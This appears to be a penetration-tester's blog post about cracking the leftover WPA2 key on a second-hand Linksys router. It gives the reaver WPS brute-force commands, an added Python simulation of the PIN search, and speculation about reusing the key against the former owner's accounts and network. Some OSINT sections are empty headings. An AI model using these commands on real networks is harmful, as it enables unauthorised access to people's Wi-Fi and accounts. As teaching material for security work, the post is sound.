Hacking ensued. In the following blog post the names of the individuals involved, as well as their SSIDs, usernames and credentials, have been modified to protect the innocent. This post is not specifically about the WPS attack. There are plenty of articles detailing the WPS attack already. However, this post came about after using it to attack a router I bought on Ebay, so here is a brief background:
I needed a wireless router with WPS to demonstrate this attack on, so I searched on Ebay. There is a good list of routers that are vulnerable to the WPS attack here. After searching for a few of the different routers on Ebay, the cheapest I found was an auction for a Cisco Linksys E1000. I ended up winning the auction for $10 with free shipping.

After receiving the router I immediately plugged it in and it powered itself on. I checked my available Wi-Fi networks and, to my surprise, there was a new network that was not named "linksys". I found myself looking at a network called "Battle Falcon!!". Battle Falcon, huh? With a WPA2 PSK on my newly obtained router? I could have just held the reset button down for the 10 seconds it takes to factory reset it and had an open "linksys" network to play with... but where's the fun in that? I decided to use the same technique that I was going to demonstrate at the lecture I will be giving.

First, I fired up my Kali VM. Then I plugged in my Alfa AWUS036H wireless card. I ran the following commands:

```
airmon-ng check kill    # kills any processes that may interfere with airmon
airmon-ng start wlan0   # puts the wireless card into monitor mode
airodump-ng mon0        # starts sniffing packets; grab the BSSID of the AP
```

After grabbing the BSSID, the next step was to run Reaver against the router to brute force its WPS PIN and obtain the PSK:

```
reaver -i mon0 -b 00:11:22:33:44:55 -v   # starts brute forcing the WPS PIN
```
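Why a Reaver run finishes in hours rather than years comes down to the PIN format and the way the WPS registrar protocol acknowledges guesses. The following is an added example, not code from the original post or from Reaver: it implements the WPS PIN checksum (the 8th digit is a checksum of the first 7, the same algorithm wpa_supplicant uses), and runs a two-phase search against a constructed stand-in access point that only mimics the pass/fail behaviour Reaver depends on. The `FakeAccessPoint` class, its method names and the assumption that the AP never locks WPS after failed attempts are all assumptions made for this example; a real AP answers over the air with M4/M5/M7 messages instead.

```python
# Added example (not from the original post): why a WPS PIN brute force
# finishes in hours. A WPS PIN is 8 digits, but the 8th is a checksum of
# the first 7, and the registrar protocol confirms the first and second
# halves of the PIN separately, so the worst case is 10^4 + 10^3 guesses
# instead of 10^8 (or 10^7 once the checksum is accounted for).


def wps_pin_checksum(pin7: int) -> int:
    """Checksum digit for a 7-digit WPS PIN prefix (wpa_supplicant's algorithm)."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def wps_pin_valid(pin: int) -> bool:
    """True if an 8-digit PIN's last digit matches the checksum of the first 7."""
    return 0 <= pin <= 99999999 and wps_pin_checksum(pin // 10) == pin % 10


class FakeAccessPoint:
    """Constructed stand-in for a WPS registrar with a fixed PIN.

    Assumption for this example: the AP never locks WPS after failed guesses.
    """

    def __init__(self, pin: int):
        if not wps_pin_valid(pin):
            raise ValueError("AP PIN must carry a valid checksum digit")
        self._first_half = pin // 10000   # digits 1-4
        self._second_half = pin % 10000   # digits 5-8 (8th is the checksum)
        self.attempts = 0

    def check_first_half(self, guess: int) -> bool:
        # A real AP only continues to M5 when the first half matched
        # (otherwise it NACKs after M4), which is what leaks this bit.
        self.attempts += 1
        return guess == self._first_half

    def check_second_half(self, first_half: int, guess: int) -> bool:
        # A real AP only sends M7 (carrying the PSK) when the second half matched.
        self.attempts += 1
        return first_half == self._first_half and guess == self._second_half


def brute_force_wps_pin(ap: FakeAccessPoint) -> int:
    """Two-phase search as Reaver does it: 4 digits, then 3 digits + derived checksum."""
    first = next(g for g in range(10000) if ap.check_first_half(g))
    for tail in range(1000):
        # Only PINs whose checksum digit is right are worth sending,
        # which is why the second phase is 1,000 guesses and not 10,000.
        candidate_pin = first * 10000 + tail * 10 + wps_pin_checksum(first * 1000 + tail)
        if ap.check_second_half(first, candidate_pin % 10000):
            return candidate_pin
    raise RuntimeError("PIN not found (AP responses inconsistent)")


def worst_case_attempts() -> int:
    """Upper bound on protocol exchanges for the two-phase search."""
    return 10_000 + 1_000


if __name__ == "__main__":
    ap = FakeAccessPoint(12345670)   # a common default PIN; passes the checksum
    found = brute_force_wps_pin(ap)
    print(f"recovered PIN {found:08d} after {ap.attempts} guesses "
          f"(worst case {worst_case_attempts()}, naive 8-digit search 10^8)")
```

At a few seconds per M1-M7 exchange, the 11,000-guess worst case is exactly the "overnight" timescale described above; the search cost is set by the protocol design, not by the strength of the PSK it ends up handing over.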
This usually takes anywhere between 3 and 12 hours, so I let it run overnight. In the morning I was looking at the pre-shared key that belonged to the "Battle Falcon!!" network. You might say "So what!? You have the password for a Wi-Fi network that no one is connected to. What harm can come of that?" Well, let's look at it from an open-source intelligence (OSINT) view. What do I know about the person who sold me the router before I do any reconnaissance?
What else can we find out about this person using OSINT?
So what do we have now?
This is where I, as an ethical security researcher, have stopped. If this person were the target of a penetration test and we had permission to attack the subject directly, we could then proceed in attempting to log in to the target's various accounts using the password we got from brute forcing the WPS PIN on their wireless router. It's pretty obvious password reuse could come into play here, since the subject's username appears to follow the same trend. Luckily, this subject didn't have a public LinkedIn account where we could easily find out where they worked. If they did, we might be able to figure out a corporate login based on what we know about the subject. Oh, and if I were really determined to compromise more of this subject's accounts, I could just drive to their house and jump on their new wireless network, more than likely using the same credentials as the one I bought, and then just sniff their traffic, attack their hosts, man-in-the-middle them, etc.

There are three things to take away from this. One, don't reuse your passwords. Two, be careful about what you are posting publicly. Three, don't sell electronic equipment that has not been factory reset or wiped completely of all your data. There are some really evil people out there who would probably have gone a lot farther than I did.

This shows how important reconnaissance is when performing a penetration test. I have not sent one packet to the target's network or tried to break into any of their accounts. But I have a lot of information that would prove very valuable if we were performing a penetration test against them.